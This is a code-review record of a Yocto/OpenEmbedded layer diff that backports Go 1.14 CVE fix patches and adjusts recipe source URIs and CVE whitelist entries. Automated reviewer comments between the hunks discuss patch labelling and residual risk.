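-HOMEPAGE = "https://glide.sh"
+HOMEPAGE = "https://github.com/Masterminds/glide"
+DESCRIPTION = "Glide is a Vendor Package Management for Golang"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=54905cf894f8cc416a92f4fc350c35b2"
 
 GO_IMPORT = "github.com/Masterminds/glide"
-SRC_URI = "git://${GO_IMPORT}"
+SRC_URI = "git://${GO_IMPORT};branch=master"
 SRCREV = "8ed5b9292379d86c39592a7e6a58eb9c903877cf"
 
 inherit go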
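Review bot: The updated `SRC_URI = "git://${GO_IMPORT};branch=master"` adds the branch but no `protocol=` parameter, so the fetch presumably stays on the fetcher's default git:// transport, which is unauthenticated and unencrypted. SRCREV pins the commit, so the checked-out content is still tied to a fixed hash, but the fetch depends on the host continuing to serve git://. The gnu-config change in this same commit adds `protocol=https`. Doing the same here, `SRC_URI = "git://${GO_IMPORT};protocol=https;branch=master"`, would be consistent with it.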
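--- a/meta/recipes-devtools/gnu-config/gnu-config_git.bb
+++ b/meta/recipes-devtools/gnu-config/gnu-config_git.bb
@@ -1,5 +1,6 @@
 SUMMARY = "gnu-configize"
 DESCRIPTION = "Tool that installs the GNU config.guess / config.sub into a directory tree"
+HOMEPAGE = "https://git.savannah.gnu.org/cgit/config.git"
 SECTION = "devel"
 LICENSE = "GPL-3.0-with-autoconf-exception"
 LIC_FILES_CHKSUM = "file://config.guess;beginline=7;endline=27;md5=b75d42f59f706ea56d6a8e00216fca6a"
@@ -11,7 +12,7 @@ INHIBIT_DEFAULT_DEPS = "1"
 SRCREV = "5256817ace8493502ec88501a19e4051c2e220b0"
 PV = "20200117+git${SRCPV}"
 
-SRC_URI = "git://git.savannah.gnu.org/config.git \
+SRC_URI = "git://git.savannah.gnu.org/git/config.git;protocol=https;branch=master \
  file://gnu-configize.in"
 S = "${WORKDIR}/git"
 UPSTREAM_CHECK_COMMITS = "1"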
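--- a/meta/recipes-devtools/go/go-1.14.inc
+++ b/meta/recipes-devtools/go/go-1.14.inc
@@ -16,6 +16,112 @@ SRC_URI += "\
  file://0006-cmd-dist-separate-host-and-target-builds.patch \
  file://0007-cmd-go-make-GOROOT-precious-by-default.patch \
  file://0008-use-GOBUILDMODE-to-set-buildmode.patch \
+ file://CVE-2021-34558.patch \
+ file://CVE-2021-33196.patch \
+ file://CVE-2021-33197.patch \
+ file://CVE-2021-38297.patch \
+ file://CVE-2022-23806.patch \
+ file://CVE-2022-23772.patch \
+ file://CVE-2021-44717.patch \
+ file://CVE-2022-24675.patch \
+ file://CVE-2021-31525.patch \
+ file://CVE-2022-30629.patch \
+ file://CVE-2022-30631.patch \
+ file://CVE-2022-30632.patch \
+ file://CVE-2022-30633.patch \
+ file://CVE-2022-30635.patch \
+ file://CVE-2022-32148.patch \
+ file://CVE-2022-32189.patch \
+ file://CVE-2021-27918.patch \
+ file://CVE-2021-36221.patch \
+ file://CVE-2021-39293.patch \
+ file://CVE-2021-41771.patch \
+ file://CVE-2022-27664.patch \
+ file://0001-CVE-2022-32190.patch \
+ file://0002-CVE-2022-32190.patch \
+ file://0003-CVE-2022-32190.patch \
+ file://0004-CVE-2022-32190.patch \
+ file://CVE-2022-2880.patch \
+ file://CVE-2022-2879.patch \
+ file://CVE-2021-33195.patch \
+ file://CVE-2021-33198.patch \
+ file://CVE-2021-44716.patch \
+ file://CVE-2022-24921.patch \
+ file://CVE-2022-28131.patch \
+ file://CVE-2022-28327.patch \
+ file://CVE-2022-41715.patch \
+ file://CVE-2022-41717.patch \
+ file://CVE-2022-1962.patch \
+ file://CVE-2022-41723.patch \
+ file://CVE-2022-41722-1.patch \
+ file://CVE-2022-41722-2.patch \
+ file://CVE-2020-29510.patch \
+ file://CVE-2023-24537.patch \
+ file://CVE-2023-24534.patch \
+ file://CVE-2023-24538-1.patch \
+ file://CVE-2023-24538-2.patch \
+ file://CVE-2023-24538_3.patch \
+ file://CVE-2023-24538_4.patch \
+ file://CVE-2023-24538_5.patch \
+ file://CVE-2023-24538_6.patch \
+ file://CVE-2023-24539.patch \
+ file://CVE-2023-24540.patch \
+ file://CVE-2023-29405-1.patch \
+ file://CVE-2023-29405-2.patch \
+ file://CVE-2023-29402.patch \
+ file://CVE-2023-29404.patch \
+ file://CVE-2023-29400.patch \
+ file://CVE-2023-29406-1.patch \
+ file://CVE-2023-29406-2.patch \
+ file://CVE-2023-29409.patch \
+ file://CVE-2022-41725-pre1.patch \
+ file://CVE-2022-41725-pre2.patch \
+ file://CVE-2022-41725-pre3.patch \
+ file://CVE-2022-41725.patch \
+ file://CVE-2023-24536_1.patch \
+ file://CVE-2023-24536_2.patch \
+ file://CVE-2023-24536_3.patch \
+ file://CVE-2023-39318.patch \
+ file://CVE-2023-39319.patch \
+ file://CVE-2023-39326.patch \
+ file://CVE-2023-45287-pre1.patch \
+ file://CVE-2023-45287-pre2.patch \
+ file://CVE-2023-45287-pre3.patch \
+ file://CVE-2023-45287.patch \
+ file://CVE-2023-45289.patch \
+ file://CVE-2023-45290.patch \
+ file://CVE-2024-24785.patch \
+ file://CVE-2024-24784.patch \
 "
+
 SRC_URI_append_libc-musl = " file://0009-ld-replace-glibc-dynamic-linker-with-musl.patch"
 SRC_URI[main.sha256sum] = "7ed13b2209e54a451835997f78035530b331c5b6943cdcd68a3d815fdc009149"
+
+# Upstream don't believe it is a signifiant real world issue and will only
+# fix in 1.17 onwards where we can drop this.
+# https://github.com/golang/go/issues/30999#issuecomment-910470358
+CVE_CHECK_WHITELIST += "CVE-2021-29923"
+
+# this issue affected go1.15 onwards
+# https://security-tracker.debian.org/tracker/CVE-2022-29526
+CVE_CHECK_WHITELIST += "CVE-2022-29526"
+
+# Issue only on windows
+CVE_CHECK_WHITELIST += "CVE-2022-29804"
+CVE_CHECK_WHITELIST += "CVE-2022-30580"
+CVE_CHECK_WHITELIST += "CVE-2022-30634"
+
+# Issue is in golang.org/x/net/html/parse.go, not used in go compiler
+CVE_CHECK_WHITELIST += "CVE-2021-33194"
+
+# Issue introduced in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2021-41772"
+
+# Fixes code that was added in go1.16, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-30630"
+
+# This is specific to Microsoft Windows
+CVE_CHECK_WHITELIST += "CVE-2022-41716"
+
+# Issue introduced in go1.15beta1, does not exist in 1.14
+CVE_CHECK_WHITELIST += "CVE-2022-1705"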
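Review bot: The CVE_CHECK_WHITELIST entry for CVE-2021-29923 differs in kind from the others added here. The rest are whitelisted because the affected code is Windows-only or absent from 1.14, while this one is whitelisted with the issue left unfixed ("will only fix in 1.17 onwards"). Whitelisting removes it from cve-check output, so the comment is the only record that the recipe still ships the affected code. Stating that directly, e.g. `# Not fixed in 1.14 (accepted risk): upstream only fixes this in 1.17+`, keeps the decision visible to anyone auditing an image. A smaller style point: the CVE-2023-24538 patch names mix `-1`/`-2` with `_3`…`_6` suffixes, which makes the series easy to mis-sort.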
diff --git a/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
new file mode 100644
index 0000000000..ad263b8023
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0001-CVE-2022-32190.patch
@@ -0,0 +1,74 @@
1From 755f2dc35a19e6806de3ecbf836fa06ad875c67a Mon Sep 17 00:00:00 2001
2From: Carl Johnson <me@carlmjohnson.net>
3Date: Fri, 4 Mar 2022 14:49:52 +0000
4Subject: [PATCH 1/4] net/url: add JoinPath, URL.JoinPath
5
6Builds on CL 332209.
7
8Fixes #47005
9
10Change-Id: I82708dede05d79a196ca63f5a4e7cb5ac9a041ea
11GitHub-Last-Rev: 51b735066eef74f5e67c3e8899c58f44c0383c61
12GitHub-Pull-Request: golang/go#50383
13Reviewed-on: https://go-review.googlesource.com/c/go/+/374654
14Reviewed-by: Russ Cox <rsc@golang.org>
15Auto-Submit: Russ Cox <rsc@golang.org>
16Trust: Ian Lance Taylor <iant@golang.org>
17Reviewed-by: Damien Neil <dneil@google.com>
18Run-TryBot: Ian Lance Taylor <iant@golang.org>
19TryBot-Result: Gopher Robot <gobot@golang.org>
20
21Upstream-Status: Backport [https://github.com/golang/go/commit/604140d93111f89911e17cb147dcf6a02d2700d0]
22CVE: CVE-2022-32190
23Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
24---
25 src/net/url/url.go | 23 +++++++++++++++++++++++
26 1 file changed, 23 insertions(+)
27
28diff --git a/src/net/url/url.go b/src/net/url/url.go
29index 2880e82..dea8bfe 100644
30--- a/src/net/url/url.go
31+++ b/src/net/url/url.go
32@@ -13,6 +13,7 @@ package url
33 import (
34 "errors"
35 "fmt"
36+ "path"
37 "sort"
38 "strconv"
39 "strings"
40@@ -1104,6 +1105,17 @@ func (u *URL) UnmarshalBinary(text []byte) error {
41 return nil
42 }
43
44+// JoinPath returns a new URL with the provided path elements joined to
45+// any existing path and the resulting path cleaned of any ./ or ../ elements.
46+func (u *URL) JoinPath(elem ...string) *URL {
47+ url := *u
48+ if len(elem) > 0 {
49+ elem = append([]string{u.Path}, elem...)
50+ url.setPath(path.Join(elem...))
51+ }
52+ return &url
53+}
54+
55 // validUserinfo reports whether s is a valid userinfo string per RFC 3986
56 // Section 3.2.1:
57 // userinfo = *( unreserved / pct-encoded / sub-delims / ":" )
58@@ -1144,3 +1156,14 @@ func stringContainsCTLByte(s string) bool {
59 }
60 return false
61 }
62+
63+// JoinPath returns a URL string with the provided path elements joined to
64+// the existing path of base and the resulting path cleaned of any ./ or ../ elements.
65+func JoinPath(base string, elem ...string) (result string, err error) {
66+ url, err := Parse(base)
67+ if err != nil {
68+ return
69+ }
70+ result = url.JoinPath(elem...).String()
71+ return
72+}
73--
742.7.4
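Review bot: This patch adds `URL.JoinPath` and `JoinPath` as new exported net/url API instead of fixing existing code, and the CVE it is filed under appears to concern JoinPath itself. If go 1.14 had no JoinPath before this series (the hunk adds it from scratch), the tree was not affected, and the series adds the function only so that the later 000N patches can correct it. A CVE_CHECK_WHITELIST entry with that rationale, like the "does not exist in 1.14" entries in go-1.14.inc, would avoid growing the exported API of a patched toolchain. If the backport stays, the patch header should say that 0001 is a prerequisite and not a fix on its own, for example `# prerequisite only: adds the API that 0002-0004 then correct`.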
diff --git a/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
new file mode 100644
index 0000000000..1a11cc72bc
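--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0002-CVE-2022-32190.patch
@@ -0,0 +1,48 @@
+From 985108de87e7d2ecb2b28cb53b323d530387b884 Mon Sep 17 00:00:00 2001
+From: Ian Lance Taylor <iant@golang.org>
+Date: Thu, 31 Mar 2022 13:21:39 -0700
+Subject: [PATCH 2/4] net/url: preserve a trailing slash in JoinPath
+
+Fixes #52074
+
+Change-Id: I30897f32e70a6ca0c4e11aaf07088c27336efaba
+Reviewed-on: https://go-review.googlesource.com/c/go/+/397256
+Trust: Ian Lance Taylor <iant@golang.org>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Matt Layher <mdlayher@gmail.com>
+Trust: Matt Layher <mdlayher@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/dbb52cc9f3e83a3040f46c2ae7650c15ab342179]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 9 ++++++++-
+ 1 file changed, 8 insertions(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index dea8bfe..3436707 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1107,11 +1107,18 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+
+ // JoinPath returns a new URL with the provided path elements joined to
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
++// Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+ url := *u
+ if len(elem) > 0 {
+ elem = append([]string{u.Path}, elem...)
+- url.setPath(path.Join(elem...))
++ p := path.Join(elem...)
++ // path.Join will remove any trailing slashes.
++ // Preserve at least one.
++ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++ p += "/"
++ }
++ url.setPath(p)
+ }
+ return &url
+ }
+--
+2.7.4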
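Review bot: The header tags this patch `CVE: CVE-2022-32190`, but the upstream message it carries only says `Fixes #52074`, and the function it edits, `JoinPath`, is itself added by patch 1/4 of the same series, so this looks like a prerequisite rather than a security fix. The same applies to 0003-CVE-2022-32190.patch; only 4/4 states `Fixes CVE-2022-32190`. I would say so in the header of both, for example `Comment: prerequisite for 0004-CVE-2022-32190.patch, adds no fix on its own`, so that a later audit does not count them as separate fixes. If the unpatched go-1.14 tree has no `JoinPath` at all, which the all-added hunk in 1/4 suggests, it is also worth recording that the series adds new exported API to the toolchain.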
diff --git a/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
new file mode 100644
index 0000000000..816d914983
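--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0003-CVE-2022-32190.patch
@@ -0,0 +1,36 @@
+From 2c632b883b0f11084cc247c8b50ad6c71fa7b447 Mon Sep 17 00:00:00 2001
+From: Sean Liao <sean@liao.dev>
+Date: Sat, 9 Jul 2022 18:38:45 +0100
+Subject: [PATCH 3/4] net/url: use EscapedPath for url.JoinPath
+
+Fixes #53763
+
+Change-Id: I08b53f159ebdce7907e8cc17316fd0c982363239
+Reviewed-on: https://go-review.googlesource.com/c/go/+/416774
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Bryan Mills <bcmills@google.com>
+Run-TryBot: Ian Lance Taylor <iant@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/bf5898ef53d1693aa572da0da746c05e9a6f15c5]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 3436707..73079a5 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1111,7 +1111,7 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ func (u *URL) JoinPath(elem ...string) *URL {
+ url := *u
+ if len(elem) > 0 {
+- elem = append([]string{u.Path}, elem...)
++ elem = append([]string{u.EscapedPath()}, elem...)
+ p := path.Join(elem...)
+ // path.Join will remove any trailing slashes.
+ // Preserve at least one.
+--
+2.7.4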
diff --git a/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
new file mode 100644
index 0000000000..4bdff3aed4
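--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/0004-CVE-2022-32190.patch
@@ -0,0 +1,82 @@
+From f61e428699cbb52bab31fe2c124f49d085a209fe Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Fri, 12 Aug 2022 16:21:09 -0700
+Subject: [PATCH 4/4] net/url: consistently remove ../ elements in JoinPath
+
+JoinPath would fail to remove relative elements from the start of
+the path when the first path element is "".
+
+In addition, JoinPath would return the original path unmodified
+when provided with no elements to join, violating the documented
+behavior of always cleaning the resulting path.
+
+Correct both these cases.
+
+ JoinPath("http://go.dev", "../go")
+ // before: http://go.dev/../go
+ // after: http://go.dev/go
+
+ JoinPath("http://go.dev/../go")
+ // before: http://go.dev/../go
+ // after: http://go.dev/go
+
+For #54385.
+Fixes #54635.
+Fixes CVE-2022-32190.
+
+Change-Id: I6d22cd160d097c50703dd96e4f453c6c118fd5d9
+Reviewed-on: https://go-review.googlesource.com/c/go/+/423514
+Reviewed-by: David Chase <drchase@google.com>
+Reviewed-by: Alan Donovan <adonovan@google.com>
+(cherry picked from commit 0765da5884adcc8b744979303a36a27092d8fc51)
+Reviewed-on: https://go-review.googlesource.com/c/go/+/425357
+Run-TryBot: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/28335508913a46e05ef0c04a18e8a1a6beb775ec]
+CVE: CVE-2022-32190
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/net/url/url.go | 26 ++++++++++++++++----------
+ 1 file changed, 16 insertions(+), 10 deletions(-)
+
+diff --git a/src/net/url/url.go b/src/net/url/url.go
+index 73079a5..1e8baf9 100644
+--- a/src/net/url/url.go
++++ b/src/net/url/url.go
+@@ -1109,17 +1109,23 @@ func (u *URL) UnmarshalBinary(text []byte) error {
+ // any existing path and the resulting path cleaned of any ./ or ../ elements.
+ // Any sequences of multiple / characters will be reduced to a single /.
+ func (u *URL) JoinPath(elem ...string) *URL {
+- url := *u
+- if len(elem) > 0 {
+- elem = append([]string{u.EscapedPath()}, elem...)
+- p := path.Join(elem...)
+- // path.Join will remove any trailing slashes.
+- // Preserve at least one.
+- if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
+- p += "/"
+- }
+- url.setPath(p)
++ elem = append([]string{u.EscapedPath()}, elem...)
++ var p string
++ if !strings.HasPrefix(elem[0], "/") {
++ // Return a relative path if u is relative,
++ // but ensure that it contains no ../ elements.
++ elem[0] = "/" + elem[0]
++ p = path.Join(elem...)[1:]
++ } else {
++ p = path.Join(elem...)
+ }
++ // path.Join will remove any trailing slashes.
++ // Preserve at least one.
++ if strings.HasSuffix(elem[len(elem)-1], "/") && !strings.HasSuffix(p, "/") {
++ p += "/"
++ }
++ url := *u
++ url.setPath(p)
+ return &url
+ }
+
+--
+2.7.4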
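Review bot: The result of `url.setPath(p)` is discarded at the end of `JoinPath`, so if setPath rejects the joined string (its definition is outside this hunk; presumably it fails on a malformed percent-escape), the caller gets a copy of u without any indication that the elements were not applied. The signature cannot return an error, so I would at least document it above the call: `// setPath's error is ignored; on failure the returned URL presumably keeps u's path unchanged.` The diffstat also lists only url.go, so the two before/after cases quoted in the commit message are not exercised by any test in this backport.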
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
new file mode 100644
index 0000000000..e1c9e0bdb9
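--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2020-29510.patch
@@ -0,0 +1,65 @@
+From a0bf4d38dc2057d28396594264bbdd43d412de22 Mon Sep 17 00:00:00 2001
+From: Filippo Valsorda <filippo@golang.org>
+Date: Tue, 27 Oct 2020 00:21:30 +0100
+Subject: [PATCH] encoding/xml: replace comments inside directives with a space
+
+A Directive (like <!ENTITY xxx []>) can't have other nodes nested inside
+it (in our data structure representation), so there is no way to
+preserve comments. The previous behavior was to just elide them, which
+however might change the semantic meaning of the surrounding markup.
+Instead, replace them with a space which hopefully has the same semantic
+effect of the comment.
+
+Directives are not actually a node type in the XML spec, which instead
+specifies each of them separately (<!ENTITY, <!DOCTYPE, etc.), each with
+its own grammar. The rules for where and when the comments are allowed
+are not straightforward, and can't be implemented without implementing
+custom logic for each of the directives.
+
+Simply preserving the comments in the body of the directive would be
+problematic, as there can be unmatched quotes inside the comment.
+Whether those quotes are considered meaningful semantically or not,
+other parsers might disagree and interpret the output differently.
+
+This issue was reported by Juho Nurminen of Mattermost as it leads to
+round-trip mismatches. See #43168. It's not being fixed in a security
+release because round-trip stability is not a currently supported
+security property of encoding/xml, and we don't believe these fixes
+would be sufficient to reliably guarantee it in the future.
+
+Fixes CVE-2020-29510
+Updates #43168
+
+Change-Id: Icd86c75beff3e1e0689543efebdad10ed5178ce3
+Reviewed-on: https://go-review.googlesource.com/c/go/+/277893
+Run-TryBot: Filippo Valsorda <filippo@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Trust: Filippo Valsorda <filippo@golang.org>
+Reviewed-by: Katie Hockman <katie@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a9cfd55e2b09735a25976d1b008a0a3c767494f8
+CVE: CVE-2020-29510
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/encoding/xml/xml.go | 6 ++++++
+ 1 file changed, 6 insertions(+)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index 01a1460..98647b2 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -768,6 +768,12 @@ func (d *Decoder) rawToken() (Token, error) {
+ }
+ b0, b1 = b1, b
+ }
++
++ // Replace the comment with a space in the returned Directive
++ // body, so that markup parts that were separated by the comment
++ // (like a "<" and a "!") don't get joined when re-encoding the
++ // Directive, taking new semantic meaning.
++ d.buf.WriteByte(' ')
+ }
+ }
+ return Directive(d.buf.Bytes()), nil
+--
+2.7.4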
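Review bot: The comment added before `d.buf.WriteByte(' ')` explains why the space is written but not what remains unguarded: the commit message states that round-trip stability is not a supported security property of encoding/xml and that this fix is not believed sufficient to guarantee it. I would carry that into the code comment, e.g. `// This does not make Directive round-trips stable; do not use re-encoded output for security decisions.` rawToken starts and ends outside the hunk, and the diffstat lists only xml.go, so no regression test comes with the backport.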
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
new file mode 100644
index 0000000000..faa3f7f641
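--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-27918.patch
@@ -0,0 +1,191 @@
+From d0b79e3513a29628f3599dc8860666b6eed75372 Mon Sep 17 00:00:00 2001
+From: Katie Hockman <katie@golang.org>
+Date: Mon, 1 Mar 2021 09:54:00 -0500
+Subject: [PATCH] encoding/xml: prevent infinite loop while decoding
+
+This change properly handles a TokenReader which
+returns an EOF in the middle of an open XML
+element.
+
+Thanks to Sam Whited for reporting this.
+
+Fixes CVE-2021-27918
+Fixes #44913
+
+Change-Id: Id02a3f3def4a1b415fa2d9a8e3b373eb6cb0f433
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1004594
+Reviewed-by: Russ Cox <rsc@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Filippo Valsorda <valsorda@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/300391
+Trust: Katie Hockman <katie@golang.org>
+Run-TryBot: Katie Hockman <katie@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Alexander Rakoczy <alex@golang.org>
+Reviewed-by: Filippo Valsorda <filippo@golang.org>
+
+https://github.com/golang/go/commit/d0b79e3513a29628f3599dc8860666b6eed75372
+CVE: CVE-2021-27918
+Upstream-Status: Backport
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+---
+ src/encoding/xml/xml.go | 19 ++++---
+ src/encoding/xml/xml_test.go | 104 +++++++++++++++++++++++++++--------
+ 2 files changed, 92 insertions(+), 31 deletions(-)
+
+diff --git a/src/encoding/xml/xml.go b/src/encoding/xml/xml.go
+index adaf4daf198b9..6f9594d7ba7a3 100644
+--- a/src/encoding/xml/xml.go
++++ b/src/encoding/xml/xml.go
+@@ -271,7 +271,7 @@ func NewTokenDecoder(t TokenReader) *Decoder {
+ // it will return an error.
+ //
+ // Token implements XML name spaces as described by
+-// https://www.w3.org/TR/REC-xml-names/. Each of the
++// https://www.w3.org/TR/REC-xml-names/. Each of the
+ // Name structures contained in the Token has the Space
+ // set to the URL identifying its name space when known.
+ // If Token encounters an unrecognized name space prefix,
+@@ -285,16 +285,17 @@ func (d *Decoder) Token() (Token, error) {
+ if d.nextToken != nil {
+ t = d.nextToken
+ d.nextToken = nil
+- } else if t, err = d.rawToken(); err != nil {
+- switch {
+- case err == io.EOF && d.t != nil:
+- err = nil
+- case err == io.EOF && d.stk != nil && d.stk.kind != stkEOF:
+- err = d.syntaxError("unexpected EOF")
++ } else {
++ if t, err = d.rawToken(); t == nil && err != nil {
++ if err == io.EOF && d.stk != nil && d.stk.kind != stkEOF {
++ err = d.syntaxError("unexpected EOF")
++ }
++ return nil, err
+ }
+- return t, err
++ // We still have a token to process, so clear any
++ // errors (e.g. EOF) and proceed.
++ err = nil
+ }
+-
+ if !d.Strict {
+ if t1, ok := d.autoClose(t); ok {
+ d.nextToken = t
+diff --git a/src/encoding/xml/xml_test.go b/src/encoding/xml/xml_test.go
+index efddca43e9102..5672ebb375f0d 100644
+--- a/src/encoding/xml/xml_test.go
++++ b/src/encoding/xml/xml_test.go
+@@ -33,30 +33,90 @@ func (t *toks) Token() (Token, error) {
+
+ func TestDecodeEOF(t *testing.T) {
+ start := StartElement{Name: Name{Local: "test"}}
+- t.Run("EarlyEOF", func(t *testing.T) {
+- d := NewTokenDecoder(&toks{earlyEOF: true, t: []Token{
+- start,
+- start.End(),
+- }})
+- err := d.Decode(&struct {
+- XMLName Name `xml:"test"`
+- }{})
+- if err != nil {
+- t.Error(err)
++ tests := []struct {
++ name string
++ tokens []Token
++ ok bool
++ }{
++ {
++ name: "OK",
++ tokens: []Token{
++ start,
++ start.End(),
++ },
++ ok: true,
++ },
++ {
++ name: "Malformed",
++ tokens: []Token{
++ start,
++ StartElement{Name: Name{Local: "bad"}},
++ start.End(),
++ },
++ ok: false,
++ },
++ }
++ for _, tc := range tests {
++ for _, eof := range []bool{true, false} {
++ name := fmt.Sprintf("%s/earlyEOF=%v", tc.name, eof)
++ t.Run(name, func(t *testing.T) {
++ d := NewTokenDecoder(&toks{
++ earlyEOF: eof,
++ t: tc.tokens,
++ })
++ err := d.Decode(&struct {
++ XMLName Name `xml:"test"`
++ }{})
++ if tc.ok && err != nil {
++ t.Fatalf("d.Decode: expected nil error, got %v", err)
++ }
++ if _, ok := err.(*SyntaxError); !tc.ok && !ok {
++ t.Errorf("d.Decode: expected syntax error, got %v", err)
++ }
++ })
+ }
+- })
+- t.Run("LateEOF", func(t *testing.T) {
+- d := NewTokenDecoder(&toks{t: []Token{
+- start,
+- start.End(),
+- }})
+- err := d.Decode(&struct {
+- XMLName Name `xml:"test"`
+- }{})
+- if err != nil {
+- t.Error(err)
++ }
++}
++
++type toksNil struct {
++ returnEOF bool
++ t []Token
++}
++
++func (t *toksNil) Token() (Token, error) {
++ if len(t.t) == 0 {
++ if !t.returnEOF {
++ // Return nil, nil before returning an EOF. It's legal, but
++ // discouraged.
++ t.returnEOF = true
++ return nil, nil
+ }
+- })
++ return nil, io.EOF
++ }
++ var tok Token
++ tok, t.t = t.t[0], t.t[1:]
++ return tok, nil
++}
++
++func TestDecodeNilToken(t *testing.T) {
++ for _, strict := range []bool{true, false} {
++ name := fmt.Sprintf("Strict=%v", strict)
++ t.Run(name, func(t *testing.T) {
++ start := StartElement{Name: Name{Local: "test"}}
++ bad := StartElement{Name: Name{Local: "bad"}}
++ d := NewTokenDecoder(&toksNil{
++ // Malformed
++ t: []Token{start, bad, start.End()},
++ })
++ d.Strict = strict
++ err := d.Decode(&struct {
++ XMLName Name `xml:"test"`
++ }{})
++ if _, ok := err.(*SyntaxError); !ok {
++ t.Errorf("d.Decode: expected syntax error, got %v", err)
++ }
++ })
++ }
+ }
+
+ const testInput = `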
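Review bot: In `Decoder.Token`, the `err = nil` after the `rawToken` call now clears every error that arrives together with a non-nil token, not only `io.EOF` as the comment's example suggests. Whether a TokenReader may return a token alongside a non-EOF error is not visible here, so I would make the intent explicit in the comment, e.g. `// Any error returned with a token (EOF or otherwise) is dropped here; the reader is expected to report it again on the next call.` Token's body continues outside the hunk.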
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
new file mode 100644
index 0000000000..afe4b0d2b8
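--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2021-31525.patch
@@ -0,0 +1,38 @@
+From efb465ada003d23353a91ef930be408eb575dba6 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Thu, 16 Jun 2022 17:40:12 +0530
+Subject: [PATCH] CVE-2021-31525
+
+Upstream-Status: Backport [https://github.com/argoheyard/lang-net/commit/701957006ef151feb43f86aa99c8a1f474f69282]
+CVE: CVE-2021-31525
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+
+---
+ src/vendor/golang.org/x/net/http/httpguts/httplex.go | 10 ++++++----
+ 1 file changed, 6 insertions(+), 4 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http/httpguts/httplex.go b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+index e7de24e..c79aa73 100644
+--- a/src/vendor/golang.org/x/net/http/httpguts/httplex.go
++++ b/src/vendor/golang.org/x/net/http/httpguts/httplex.go
+@@ -137,11 +137,13 @@ func trimOWS(x string) string {
+ // contains token amongst its comma-separated tokens, ASCII
+ // case-insensitively.
+ func headerValueContainsToken(v string, token string) bool {
+- v = trimOWS(v)
+- if comma := strings.IndexByte(v, ','); comma != -1 {
+- return tokenEqual(trimOWS(v[:comma]), token) || headerValueContainsToken(v[comma+1:], token)
++ for comma := strings.IndexByte(v, ','); comma != -1; comma = strings.IndexByte(v, ',') {
++ if tokenEqual(trimOWS(v[:comma]), token) {
++ return true
++ }
++ v = v[comma+1:]
+ }
+- return tokenEqual(v, token)
++ return tokenEqual(trimOWS(v), token)
+ }
+
+ // lowerASCII returns the ASCII lowercase version of b.
+--
+2.25.1
+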
